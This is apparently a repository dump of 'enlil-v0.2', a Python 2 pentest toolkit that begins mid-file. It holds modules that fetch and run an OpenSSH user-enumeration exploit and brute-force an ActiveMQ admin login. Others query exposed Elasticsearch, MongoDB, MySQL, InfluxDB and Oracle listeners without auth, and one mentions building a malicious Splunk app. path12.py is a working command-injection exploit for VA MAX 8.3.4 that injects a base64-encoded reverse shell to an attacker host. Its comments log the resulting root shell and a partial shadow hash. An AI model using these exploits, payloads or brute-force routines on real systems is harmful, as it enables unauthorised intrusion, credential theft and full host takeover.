169 | print OKGREEN + ' [+] Splunk app rewrited: /tmp/apkash.tgz\n' + ENDC
170 | print appname
171 |
172 |
173 | elif get_or_have == '2':
174 | print ' [+] using local app:'
175 |
176 | else:
177 | print FAIL + ' [-] Maybe later ;[\n' + ENDC
178 |
179 |
180 | print OKGREEN + ' [+] Creating Splunk evil app - finished.\n' + ENDC
181 |
182 |
183 |
184 | ### ---
185 | def receive_port():
186 |
187 | # print OKGREEN
188 | # print ' [+] receive some answers from remote port' + ENDC
189 | print '' + BOLD + '\n'
190 |
191 | target = raw_input(' set target: ')
192 | port = raw_input(' set port: ')
193 |
194 | try:
195 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
196 | conn = s.connect((target, int(port)))
197 |
198 | print '\n [+] received:'
199 | print s.recv(1024)
200 | print ' -- -- --\n'
201 |
202 | #s.send('GET /' + buffer + ' HTTP/1.0\r\n\r\n')
203 | #print s.recv(1024)
204 | s.send('quit\r\n')
205 | s.close()
206 |
207 | except socket.error:
208 | print FAIL + ' [-] Connection error ;Z\n' + ENDC
209 |
210 |
211 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path01.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path01: openssh enum bug
3 |
4 | # --- imports ---
5 | import subprocess
6 |
7 |
8 | # --- super colours ---
9 | HEADER = '\033[95m'
10 | OKBLUE = '\033[94m'
11 | OKGREEN = '\033[92m'
12 | WARNING = '\033[93m'
13 | FAIL = '\033[91m'
14 | ENDC = '\033[0m'
15 | BOLD = '\033[1m'
16 | UNDERLINE = '\033[4m'
17 |
18 |
19 |
20 | def enum():
21 | print OKGREEN + ' [+] path 1: openssh enum bug' + ENDC
22 | print ''
23 |
24 | print OKGREEN + ' [+] preparing...\n' + ENDC + BOLD
25 |
26 | grab_or_not = raw_input(' using tool [local/wget]: ')
27 | print '\n' + ENDC
28 |
29 | pocpath = '/tmp/45233.py' # for 'default'
30 |
31 | if grab_or_not == 'wget':
32 | # grab poc from EDB:45233; CVE-2018-15473
33 | getpoc = 'wget --no-check-certificate https://www.exploit-db.com/download/45233 -O ' + pocpath
34 | subprocess.call([ getpoc ],shell=True)
35 | print '' + OKGREEN
36 | print ' poc should be ready to configure...' + ENDC
37 |
38 | elif grab_or_not == 'local':
39 | print ' [1] /tmp/45233.py ("default")'
40 | print ' [2] > ')
49 | print ENDC
50 |
51 | print BOLD
52 | target = raw_input(' set target: ')
53 | port = raw_input(' set port: ')
54 | threads = 2
55 | outputFile = 'ssh-enum-bug-'+target+'.log'
56 | userlist = raw_input(' (full path to) userlist[/tmp/users.txt]: ')
57 | print ENDC
58 |
59 | runEnumPoc = 'python ' + pocpath + ' --port ' + port
60 | runEnumPoc += ' --threads 2 --outputFile /tmp/' + outputFile
61 | runEnumPoc += ' --userList ' + userlist + ' ' + target
62 | subprocess.call([ runEnumPoc ], shell=True)
63 |
64 | print OKGREEN + '\n [+] poc finished, checking results:' + ENDC
65 | enumusers = '/tmp/'+outputFile
66 | readusers = open(enumusers,'r')
67 | lines = readusers.read()
68 | print '\n' + lines
69 | readusers.close()
70 |
71 | print ' [+] logfile saved to %s\n' % ( enumusers )
72 | print '\n' + OKGREEN
73 | print ' [+] path 1: openssh enum - finished.\n' + ENDC
74 |
75 |
76 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path02.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path02: testing kibana
3 | #
4 | # current:
5 | # - getversion
6 | #
7 |
8 | # --- imports ---
9 | import subprocess
10 | import re
11 | import requests
12 |
13 | # --- super colours ---
14 | HEADER = '\033[95m'
15 | OKBLUE = '\033[94m'
16 | OKGREEN = '\033[92m'
17 | WARNING = '\033[93m'
18 | FAIL = '\033[91m'
19 | ENDC = '\033[0m'
20 | BOLD = '\033[1m'
21 | UNDERLINE = '\033[4m'
22 |
23 |
24 |
25 | def getversion():
26 | print OKGREEN + ' [+] path 2: kibana webapp' + ENDC
27 | print ''
28 |
29 | # GET to IP:5601 to grab version
30 | print BOLD
31 | target = raw_input(' set target: ')
32 | print ' port: 5601'
33 | fullUrl = 'http://' + target + ':5601/app/kibana'
34 | print ' full url: ' + fullUrl # http://' + target + ':5601/app/kibana'
35 |
36 | print ENDC
37 | print ' [+] checking version...'
38 | req = requests.get(fullUrl)
39 | resp = req.text
40 |
41 | findver = re.compile('kbn-injected-metadata data="{"version":"(.*?)",')
42 | foundver = re.search(findver, resp)
43 |
44 | if foundver:
45 | print OKGREEN
46 | print ' [+] Kibana version: %s' % ( foundver.group(1) )
47 | print ENDC
48 |
49 | else:
50 | print FAIL + ' [-] Could not determine Kibana version, sorry :<' + ENDC
51 | print ''
52 |
53 |
54 | print '' + BOLD
55 | print ' [+] path 02: kibana webappp - finished.' + ENDC
56 | print ''
57 |
58 |
59 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path03.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path03: elasticsearch
3 | #
4 | # current:
5 | # - getversion
6 | # - preauth_search
7 | #
8 |
9 | # --- imports ---
10 | import subprocess
11 | import requests
12 | import json
13 |
14 | # --- super colours ---
15 | HEADER = '\033[95m'
16 | OKBLUE = '\033[94m'
17 | OKGREEN = '\033[92m'
18 | WARNING = '\033[93m'
19 | FAIL = '\033[91m'
20 | ENDC = '\033[0m'
21 | BOLD = '\033[1m'
22 | UNDERLINE = '\033[4m'
23 |
24 |
25 |
26 | def getversion():
27 | print OKGREEN + ' [+] path 3a: elasticsearch on 9200 - get version' + ENDC
28 | print
29 |
30 | print BOLD
31 | target = raw_input(' set target: ')
32 | print ' port: 9200' + ENDC
33 |
34 | fullUrl = 'http://' + target + ':9200/'
35 | headers = {'content-type':'application/json'}
36 |
37 | print OKBLUE + ' [i] checking version...' + ENDC
38 | req = requests.get(fullUrl, headers=headers)
39 | resp = req.text
40 |
41 | print ' -- resp --\n'
42 | print resp
43 | print ' -- end of resp --\n'
44 |
45 | print BOLD + ' [+] path 3a - elasticsearch on 9200 - get version - finished.\n' + ENDC
46 |
47 | ##
48 |
49 |
50 | def preauth_search():
51 | print OKGREEN + ' [+] path 3b: elasticsearch on 9200 - preauth search' + ENDC
52 | print ''
53 |
54 | print BOLD
55 | target = raw_input(' set target: ')
56 | print ' port: 9200'
57 | print ENDC
58 |
59 | fullUrl = 'http://' + target + ':9200/_search'
60 | url_data = {"query":{"match_all":{}}}
61 | headers = {'content-type':'application/json'}
62 |
63 | print OKBLUE + ' [i] sending search request...' + ENDC
64 | req = requests.post(fullUrl, data=json.dumps(url_data), headers=headers)
65 | resp = req.text
66 |
67 | print ' -- resp --\n'
68 | print resp
69 | print ' -- end of resp --\n'
70 |
71 | print BOLD + ' [+] path 3b - elasticsearch on 9200 - preauth search - finished.\n' + ENDC
72 |
73 | ##
74 |
75 |
76 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path04.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path04: oracle tns listener
3 | #
4 | # current:
5 | # -- tnscmd10g using: ping, status, version
6 | #
7 |
8 | # --- imports ---
9 | import subprocess
10 | import re
11 |
12 | # --- super colours ---
13 | HEADER = '\033[95m'
14 | OKBLUE = '\033[94m'
15 | OKGREEN = '\033[92m'
16 | WARNING = '\033[93m'
17 | FAIL = '\033[91m'
18 | ENDC = '\033[0m'
19 | BOLD = '\033[1m'
20 | UNDERLINE = '\033[4m'
21 |
22 |
23 |
24 | def tnscmds():
25 | print OKGREEN + ' [+] path 4: oracle tns listener unauthorized' + ENDC
26 | print '' + BOLD
27 |
28 | target = raw_input(' set target: ')
29 | port = raw_input(' set port: ')
30 | print ENDC
31 |
32 | # try ping
33 | print OKGREEN
34 | print '\n [+] checking: ping\n' + ENDC
35 | check_ping = 'tnscmd10g ping -h ' + target + ' -p ' + port
36 | subprocess.call([check_ping], shell=True)
37 | print '\n'
38 |
39 | print OKGREEN + ' [+] checking: version\n' + ENDC
40 | check_vers = 'tnscmd10g version -h ' + target + ' -p ' + port
41 | subprocess.call([check_vers], shell=True)
42 | print '\n'
43 |
44 | print OKGREEN + ' [+] checking: status\n' + ENDC
45 | check_stat = 'tnscmd10g status -h ' + target + ' -p ' + port
46 | subprocess.call([check_stat], shell=True)
47 | print '\n'
48 |
49 |
50 | print OKGREEN
51 | print ' [+] path 4: oracle tns listener - finished.\n' + ENDC
52 |
53 | ##
54 |
55 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path05.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path05: testing splunk
3 | #
4 | # current:
5 | # - getversion
6 | #
7 |
8 | # --- imports ---
9 | import subprocess
10 | import re
11 | import requests
12 | import sys
13 | import urllib3
14 | urllib3.disable_warnings()
15 |
16 | # --- super colours ---
17 | HEADER = '\033[95m'
18 | OKBLUE = '\033[94m'
19 | OKGREEN = '\033[92m'
20 | WARNING = '\033[93m'
21 | FAIL = '\033[91m'
22 | ENDC = '\033[0m'
23 | BOLD = '\033[1m'
24 | UNDERLINE = '\033[4m'
25 |
26 |
27 |
28 | def getversion():
29 | print OKGREEN + ' [+] path 5a: Splunk webapp (default:8000/tcp)' + ENDC
30 | print ''
31 |
32 | # GET to IP:5601 to grab version
33 | print BOLD
34 | target = raw_input(' set target: ')
35 | port = raw_input(' set port: ')
36 | print ENDC
37 |
38 | print OKBLUE
39 | print ' [+] Trying to identify version...' + ENDC
40 |
41 | fullUrl = 'http://' + target + ':' + port + '/en-US/'
42 | req = requests.get(fullUrl)
43 | resp = req.text
44 |
45 | find = re.compile('')
46 | found = re.search(find, resp)
47 |
48 | if found:
49 | print OKGREEN
50 | print ' [+] Found version: ' + found.group(1) + '\n' + ENDC
51 |
52 | #
53 | print '' + BOLD
54 | print ' [+] path 05a: Splunk webappp - finished.\n' + ENDC
55 | print ''
56 |
57 | ##
58 |
59 |
60 | def getrest():
61 | print OKGREEN + ' [+] path 5b: Splunk REST API (default: 8089/tcp)' + ENDC
62 | print ''
63 |
64 | # GET to IP:5601 to grab version
65 | print BOLD
66 | target = raw_input(' set target: ')
67 | port = raw_input(' set port: ')
68 | print ENDC
69 |
70 | print OKBLUE
71 | print ' [+] Trying to identify version...' + ENDC
72 |
73 | # grabbed from:
74 | # https://stackoverflow.com/questions/47716695/write-log-entry-to-splunk-via-http-in-python/47756716#47756716
75 | url='https://' + target + ':8089/'
76 | authHeader = {'Authorization': 'Splunk {}'.format('ABCDEFG-8A55-4ABB-HIJK-1A7E6637LMNO')}
77 | jsonDict = {"index":"cloud_custodian", "event": { 'message' : "Sample pentest message" } }
78 |
79 | r = requests.post(url, headers=authHeader, json=jsonDict, verify=False)
80 | resp = r.text
81 |
82 | find_title = re.findall("(.*?)", resp, re.MULTILINE)
83 | #find_ids = re.findall("(.*?)", resp, re.MULTILINE)
84 |
85 | for title in find_title:
86 | print OKGREEN
87 | print ' Found title: %s' % ( title )
88 | print ENDC + BOLD
89 | # req2: GETi found services
90 | try:
91 | getservice = 'https://' + target + ':' + port+ '/' + title
92 | req2 = requests.get(getservice, headers=authHeader, verify=False)
93 | resp2 = req2.text
94 | find_links = re.findall(' %s' % ( link )
100 |
101 | print ' --- end of service %s ---\n' % ( title )
102 |
103 |
104 |
105 | except requests.exceptions.ConnectionError as e:
106 | print ' [-] error when requesting %s:\n%s' % ( title, e )
107 | pass
108 |
109 |
110 |
111 |
112 | #
113 | print '' + BOLD
114 | print ' [+] path 05b: Splunk webappp - finished.\n' + ENDC
115 | print ''
116 |
117 | ##
118 |
119 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path06.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path06: testing influxdb
3 | #
4 | # current:
5 | # - getDBs - list available (preauth) databases
6 | #
7 |
8 | # --- imports ---
9 | import subprocess
10 | import re
11 | import requests
12 |
13 | # --- super colours ---
14 | HEADER = '\033[95m'
15 | OKBLUE = '\033[94m'
16 | OKGREEN = '\033[92m'
17 | WARNING = '\033[93m'
18 | FAIL = '\033[91m'
19 | ENDC = '\033[0m'
20 | BOLD = '\033[1m'
21 | UNDERLINE = '\033[4m'
22 |
23 |
24 |
25 | def getDBs():
26 | print OKGREEN + ' [+] path 6: influxdb - get DB\'s' + ENDC
27 | print ''
28 |
29 | # GET to IP:5601 to grab version
30 | print BOLD
31 | target = raw_input(' set target: ')
32 | print ' port: 8086'
33 | fullUrl = 'http://' + target + ':8086/query?q=SHOW+DATABASES&db=_internal'
34 | # print ' full url: ' + fullUrl # http://' + target + ':5601/app/kibana'
35 |
36 | print ENDC
37 | print ' [+] checking version...'
38 | req = requests.get(fullUrl)
39 | resp = req.text
40 |
41 | print BOLD
42 | print ' --- resp ---' + ENDC
43 | print resp
44 | print BOLD + '\n --- end of resp --- \n' + ENDC
45 |
46 |
47 | print '' + BOLD
48 | print ' [+] path 06: influxdb - get DB\'s - finished.' + ENDC
49 | print ''
50 |
51 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path07.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path07: testing mongodb
3 | #
4 | # note: to use this path you'll need to:
5 | # # apt-get install python-pymongo -y
6 | #
7 | # current:
8 | # - preauthlist
9 | # - postauthlist
10 |
11 | # --- imports ---
12 | import pymongo
13 | from pymongo import MongoClient
14 | import subprocess
15 | import re
16 |
17 | # --- super colours ---
18 | HEADER = '\033[95m'
19 | OKBLUE = '\033[94m'
20 | OKGREEN = '\033[92m'
21 | WARNING = '\033[93m'
22 | FAIL = '\033[91m'
23 | ENDC = '\033[0m'
24 | BOLD = '\033[1m'
25 | UNDERLINE = '\033[4m'
26 |
27 |
28 | def preauthlist():
29 | print OKGREEN + ' [+] path 7a: mongodb - preauth list DB\'s' + ENDC
30 |
31 | # GET to IP:5601 to grab version
32 | print BOLD
33 | target = raw_input(' set target: ')
34 | port = raw_input(' set port[27017]: ')
35 |
36 | try:
37 | client = MongoClient(target, int(port) )
38 | print OKGREEN + '\n [+] We are connected! :)\n' + ENDC
39 | print BOLD + ' [+] Listing available databases:' + ENDC
40 | dbs = client.list_database_names()
41 | for db in dbs:
42 | print ' -db-> %s' % ( db )
43 |
44 | except pymongo.errors.OperationFailure:
45 | print FAIL + ' [-] We need some credentials to access DB ;[\n' + ENDC
46 |
47 | except pymongo.errors.ServerSelectionTimeoutError:
48 | print FAIL + ' [-] We can not connect to remote DB (timeout) :Z\n' + ENDC
49 |
50 |
51 | print '' + BOLD
52 | print ' [+] path 7a: mongodb - preauth list - finished.' + ENDC
53 | print ''
54 |
55 | def postauthlist():
56 | print OKGREEN + ' [+] path 7b: mongodb - postauth list DB\'s' + ENDC
57 |
58 | # GET to IP:5601 to grab version
59 | print BOLD
60 | target = raw_input(' set target: ')
61 | port = raw_input(' set port[27017]: ')
62 | user = raw_input(' try username: ')
63 | passwd = raw_input(' try password: ')
64 |
65 | conn_str = 'mongodb://' + user + ':' + passwd + '@' + target + ':' + port + '/'
66 | # print conn_str
67 |
68 | try:
69 | client = MongoClient( conn_str )
70 | print OKGREEN + '\n [+] We are connected! :)\n' + ENDC
71 | print BOLD + ' [+] Listing available databases:' + ENDC
72 | dbs = client.list_database_names()
73 | for db in dbs:
74 | print ' -db-> %s' % ( db )
75 |
76 | except pymongo.errors.OperationFailure:
77 | print FAIL + ' [-] Wrong credentials :C\n' + ENDC
78 |
79 | except pymongo.errors.ServerSelectionTimeoutError:
80 | print FAIL + ' [-] We can not connect to remote DB (timeout) :Z\n' + ENDC
81 |
82 |
83 | print '' + BOLD
84 | print ' [+] path 7b: mongodb - postauth list - finished.' + ENDC
85 | print ''
86 |
87 |
88 |
89 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path08.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path08: testing pcp
3 | #
4 | # current:
5 | # - getstats
6 | #
7 |
8 | # --- imports ---
9 | import subprocess
10 | import re
11 |
12 | # --- super colours ---
13 | HEADER = '\033[95m'
14 | OKBLUE = '\033[94m'
15 | OKGREEN = '\033[92m'
16 | WARNING = '\033[93m'
17 | FAIL = '\033[91m'
18 | ENDC = '\033[0m'
19 | BOLD = '\033[1m'
20 | UNDERLINE = '\033[4m'
21 |
22 |
23 |
24 | def getstats():
25 | # Available Commands: atop atopsar collectl dmcache dstat
26 | # free iostat ipcs lvmcache mpstat numastat pidstat python
27 | # shping summary tapestat uptime verify vmstat
28 |
29 | print BOLD
30 | target = raw_input(' set target: ')
31 | port = raw_input(' set port: ')
32 |
33 | try:
34 | print '\n --- response ---\n'
35 | cmd = 'uptime'
36 | pcp = 'pcp -h ' + target + ' -p ' + port + ' ' + cmd
37 | subprocess.call([ pcp ], shell=True)
38 |
39 | print '\n --- response ---\n'
40 | except:
41 | print FAIL + ' [-] Can not find pcp - install it!\n' + ENDC
42 |
43 |
44 | print OKGREEN + ' [+] path 8: testing pcp' + ENDC
45 | print ''
46 |
47 |
48 | print '' + BOLD
49 | print ' [+] path 08: testing pcp - finished.' + ENDC
50 | print ''
51 |
52 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path09.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path09: finding mysql
3 | #
4 | # current:
5 | # - ...
6 | #
7 |
8 | # --- imports ---
9 | import subprocess
10 | import re
11 | import MySQLdb
12 |
13 | # --- super colours ---
14 | HEADER = '\033[95m'
15 | OKBLUE = '\033[94m'
16 | OKGREEN = '\033[92m'
17 | WARNING = '\033[93m'
18 | FAIL = '\033[91m'
19 | ENDC = '\033[0m'
20 | BOLD = '\033[1m'
21 | UNDERLINE = '\033[4m'
22 |
23 |
24 | def getdbs():
25 | print OKGREEN + ' [+] path 9: testing mysql' + ENDC
26 | print ''
27 |
28 | print BOLD
29 | target = raw_input(' set target: ')
30 | port = raw_input(' set port: ')
31 |
32 | try:
33 | # connecting people
34 | db = MySQLdb.connect( host = target,
35 | user='mysql',
36 | passwd='',
37 | db='' )
38 |
39 | # creating cursor for all execs/queries
40 | cur = db.cursor()
41 |
42 | # gogogo
43 | cur.execute("show databases")
44 |
45 | for row in cur.fetchall():
46 | print row[0]
47 |
48 | db.close()
49 |
50 | except MySQLdb.OperationalError:
51 | print FAIL + '\n [-] Can not connect, sorry :Z\n' + ENDC
52 |
53 |
54 |
55 | print '' + BOLD
56 | print ' [+] path 9: testing mysql - finished.' + ENDC
57 | print ''
58 |
59 |
60 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path10.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path10: testing Prometheus (9090/tcp)
3 | #
4 | # current:
5 | # - (preauth) getinfo
6 | #
7 |
8 | # --- imports ---
9 | import subprocess
10 | import re
11 | import requests
12 | import sys
13 | import urllib3
14 | urllib3.disable_warnings()
15 |
16 | # --- super colours ---
17 | HEADER = '\033[95m'
18 | OKBLUE = '\033[94m'
19 | OKGREEN = '\033[92m'
20 | WARNING = '\033[93m'
21 | FAIL = '\033[91m'
22 | ENDC = '\033[0m'
23 | BOLD = '\033[1m'
24 | UNDERLINE = '\033[4m'
25 |
26 |
27 |
28 | def getinfo():
29 | print OKGREEN + ' [+] path 10: Prometheus - pretuah - get_info' + ENDC
30 | print ''
31 |
32 | print BOLD
33 | target = raw_input(' set target: ')
34 | port = raw_input(' set port: ') # default 9090/tcp
35 | print ENDC
36 |
37 | print OKBLUE
38 | print ' [+] Trying to identify version...' + ENDC
39 |
40 | # ... STILL IN PROGRESS... ;Z ...
41 |
42 |
43 | #
44 | print '' + BOLD
45 | print ' [+] path 10: Prometheus - preauth - get_info - finished.\n' + ENDC
46 | print ''
47 |
48 | ##
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path11.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path11: testing activemq - admin panel
3 | #
4 | # based on:
5 | # https://raw.githubusercontent.com/c610/tmp/master/actlikeMQ.py
6 | #
7 | # current:
8 | # - bf
9 | # - sender
10 |
11 | # --- imports ---
12 | import subprocess
13 | import re
14 | import sys
15 | import requests
16 | from requests.auth import HTTPBasicAuth
17 | from stomp import * # for STOMP protocol
18 | import stomp
19 |
20 | # --- super colours ---
21 | HEADER = '\033[95m'
22 | OKBLUE = '\033[94m'
23 | OKGREEN = '\033[92m'
24 | WARNING = '\033[93m'
25 | FAIL = '\033[91m'
26 | ENDC = '\033[0m'
27 | BOLD = '\033[1m'
28 | UNDERLINE = '\033[4m'
29 |
30 |
31 |
32 | def bfadmin():
33 | print OKGREEN + ' [+] path 13a: testing activemq - admin panel' + ENDC
34 | print ''
35 |
36 | print BOLD
37 | target = raw_input(' set target: ')
38 | port = raw_input(' set port: ')
39 |
40 | remote_host = 'http://' + target + ':' + port + '/admin/'
41 | our_user = 'admin'
42 | pwd_file = '/usr/share/wordlists/dirb/common.txt'
43 |
44 | try:
45 | sess = requests.session()
46 |
47 | read_pwds = open(pwd_file, 'r')
48 | pwds = read_pwds.readlines()
49 |
50 | for pwd in pwds:
51 | pwd = pwd.rstrip()
52 | logme = sess.post(remote_host, auth=HTTPBasicAuth(our_user, pwd))
53 | logmeresp = logme.text
54 |
55 | #print logmeresp
56 | if 'ActiveMQ Console' in logmeresp:
57 | print '[+] admin user logged-in! :D'
58 | sys.exit(0) # w0w s0 1337!11
59 |
60 | except requests.exceptions.ConnectionError:
61 | print FAIL + ' [-] Can not connect to remote ActiveMQ panel :C\n' + ENDC
62 |
63 | print '' + BOLD
64 | print ' [+] path 13a: testing activemq - admin panel' + ENDC
65 | print ''
66 |
67 |
68 | # send msg to remote MQ
69 | def sender():
70 |
71 | print OKGREEN + ' [+] path 13b: testing activemq - admin panel' + ENDC
72 | print ''
73 |
74 | print BOLD
75 | target = raw_input(' set target: ')
76 | port = raw_input(' set port: ') # 61616/tcp
77 | username = raw_input(' set user: ')
78 | passwd = raw_input(' set password: ')
79 | our_queue = raw_input(' set queue: ') # /queue/test1
80 | print ENDC
81 |
82 | try:
83 | conn = stomp.Connection( [ (target, port)])
84 | conn.start()
85 | print OKGREEN
86 | print ' [+] connecting to %s on port %s' % ( target , port )
87 | print ENDC
88 | print ' [i] now trying to log in...'
89 |
90 | print OKGREEN
91 | conn.connect(username, passwd, wait=False) # True)
92 | print ENDC
93 |
94 | conn.send( our_queue, 'msg from pentester ;)')
95 | conn.disconnect()
96 |
97 | except stomp.exception.ConnectFailedException:
98 | print FAIL + ' [-] Can not connect to remote MQ, sorry :C\n' + ENDC
99 |
100 | print '' + BOLD
101 | print ' [+] path 13b: testing activemq - admin panel' + ENDC
102 | print ''
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path12.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # quick poc for postauth rce bug in va max 8.3.4
3 | #
4 | # more:
5 | # https://code610.blogspot.com
6 | #
7 | # 10.02.2019
8 | #
9 |
10 | # p.s.
11 | #
12 | # listening on [any] 4444 ...
13 | # 192.168.1.126: inverse host lookup failed: Unknown host
14 | # connect to [192.168.1.160] from (UNKNOWN) [192.168.1.126] 58894
15 | # sh: no job control in this shell
16 | # sh-4.1$ id
17 | # id
18 | # uid=48(apache) gid=48(apache) groups=48(apache),10(wheel),18(dialout)
19 | # sh-4.1$ cat /etc/shadow
20 | # cat /etc/shadow
21 | # cat: /etc/shadow: Permission denied
22 | # sh-4.1$
23 | # (...)
24 | # sh-4.1$ sudo -l
25 | # sudo -l
26 | # Matching Defaults entries for apache on this host:
27 | # syslog_goodpri=debug, env_reset,
28 | # secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
29 | #
30 | # User apache may run the following commands on this host:
31 | # (ALL) NOPASSWD: ALL
32 | # sh-4.1$ sudo su
33 | # sudo su
34 | # id
35 | # uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
36 | # head -n1 /etc/shadow
37 | # root:$6$dNu030j/gSf.5(...)4IlAEGpzHv0:15392:0:99999:7:::
38 | #
39 | #
40 |
41 | #* prepared for enlil-v0.2 (02.06.2019@21:36)
42 |
43 |
44 | # o/
45 |
46 | # --- imports ---
47 | import datetime, time
48 | import requests
49 | from requests.auth import HTTPBasicAuth
50 | import subprocess
51 | import re
52 |
53 | # --- super colours ---
54 | HEADER = '\033[95m'
55 | OKBLUE = '\033[94m'
56 | OKGREEN = '\033[92m'
57 | WARNING = '\033[93m'
58 | FAIL = '\033[91m'
59 | ENDC = '\033[0m'
60 | BOLD = '\033[1m'
61 | UNDERLINE = '\033[4m'
62 |
63 | def getrce():
64 | # defines
65 | dateTime = datetime.datetime.now()
66 | timestamp = int(time.mktime(dateTime.timetuple()))
67 |
68 | print BOLD
69 | target = raw_input(' set target: ')
70 | port = raw_input(' set port: ') # 9080?
71 |
72 | remote_host = 'http://' + target + ':' + port # 192.168.1.126:9080'
73 | our_user = raw_input(' set user: ') # 'loadbalancer'
74 | our_passwd = raw_input(' set passwd: ') # 'loadbalancer'
75 | print ENDC + '\n'
76 | # go
77 | sess = requests.session()
78 | logme = sess.post(remote_host, auth=HTTPBasicAuth(our_user, our_passwd))
79 | logmeresp = logme.text
80 |
81 | print OKGREEN
82 | print '\n\t[+] small poc for VA MAX 8.3.4\n' + ENDC + BOLD
83 | # based on:
84 | # https://raw.githubusercontent.com/c610/tmp/master/postauth-rce-poc.py
85 |
86 | # try to log in
87 | if 'Load Balancer Administration System' in logmeresp:
88 | print ' [+] using credentials: %s : %s' % ( our_user, our_passwd )
89 | print ' [+] our timestamp: %s' % ( timestamp )
90 | print ' [+] proceed.' + ENDC
91 |
92 | getme = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
93 | dogetme = sess.get(getme, auth=HTTPBasicAuth(our_user, our_passwd))
94 | getmeresp = dogetme.text
95 | payload = "h4x;echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9J TkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xLjE2MCIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3 MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk7Jwo= | base64 -d | sh;#"
96 |
97 | #payload = "h4x;telnet 192.168.1.160 4444;#"
98 | #payload = ';id>/tmp/id.id.id'
99 | # print '[i] using payload:', payload
100 |
101 | data_req = {
102 | 'eth0' : '192.168.1.126/24',
103 | 'mtu_eth0' : '1500' + payload, # >.<
104 | 'eth1' : '',
105 | 'mtu_eth1' : '1500',
106 | 'eth2' : '',
107 | 'mtu_eth2' : '1500',
108 | 'eth3' : '',
109 | 'mtu_eth3' : '1500',
110 | 'go' : 'Configure+Interfaces'
111 | }
112 | shLink = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
113 | shellWe = sess.post(shLink, data=data_req, auth=HTTPBasicAuth(our_user, our_passwd))
114 | shResp = shellWe.text
115 | print OKGREEN
116 | # check sudo -l now :>
117 | print '\n\nThanks.Bye.\n' + ENDC
118 |
119 |
120 |
121 |
122 |
123 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path13.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path13: testing activemq - admin panel
3 | #
4 | # based on:
5 | # https://raw.githubusercontent.com/c610/tmp/master/actlikeMQ.py
6 | #
7 | # detailed tutorial:
8 | # https://www.youtube.com/watch?v=CD-E-LDc384
9 | #
10 | # current:
11 | # - bf
12 | # - sender
13 |
14 | # --- imports ---
15 | import subprocess
16 | import re
17 | import sys
18 | import requests
19 | from requests.auth import HTTPBasicAuth
20 | from stomp import * # for STOMP protocol
21 | import stomp
22 |
23 | # --- super colours ---
24 | HEADER = '\033[95m'
25 | OKBLUE = '\033[94m'
26 | OKGREEN = '\033[92m'
27 | WARNING = '\033[93m'
28 | FAIL = '\033[91m'
29 | ENDC = '\033[0m'
30 | BOLD = '\033[1m'
31 | UNDERLINE = '\033[4m'
32 |
33 |
34 |
35 | def bfadmin():
36 | print OKGREEN + ' [+] path 13a: testing activemq - admin panel' + ENDC
37 | print ''
38 |
39 | print BOLD
40 | target = raw_input(' set target: ')
41 | port = raw_input(' set port: ')
42 |
43 | remote_host = 'http://' + target + ':' + port + '/admin/'
44 | our_user = 'admin'
45 | pwd_file = '/usr/share/wordlists/dirb/common.txt'
46 |
47 | try:
48 | sess = requests.session()
49 |
50 | read_pwds = open(pwd_file, 'r')
51 | pwds = read_pwds.readlines()
52 |
53 | for pwd in pwds:
54 | pwd = pwd.rstrip()
55 | logme = sess.post(remote_host, auth=HTTPBasicAuth(our_user, pwd))
56 | logmeresp = logme.text
57 |
58 | #print logmeresp
59 | if 'ActiveMQ Console' in logmeresp:
60 | print '[+] admin user logged-in! :D'
61 | sys.exit(0) # w0w s0 1337!11
62 |
63 | except requests.exceptions.ConnectionError:
64 | print FAIL + ' [-] Can not connect to remote ActiveMQ panel :C\n' + ENDC
65 |
66 | print '' + BOLD
67 | print ' [+] path 13a: testing activemq - admin panel' + ENDC
68 | print ''
69 |
70 |
71 | # send msg to remote MQ
72 | def sender():
73 |
74 | print OKGREEN + ' [+] path 13b: testing activemq - admin panel' + ENDC
75 | print ''
76 |
77 | print BOLD
78 | target = raw_input(' set target: ')
79 | port = raw_input(' set port: ') # 61616/tcp
80 | username = raw_input(' set user: ')
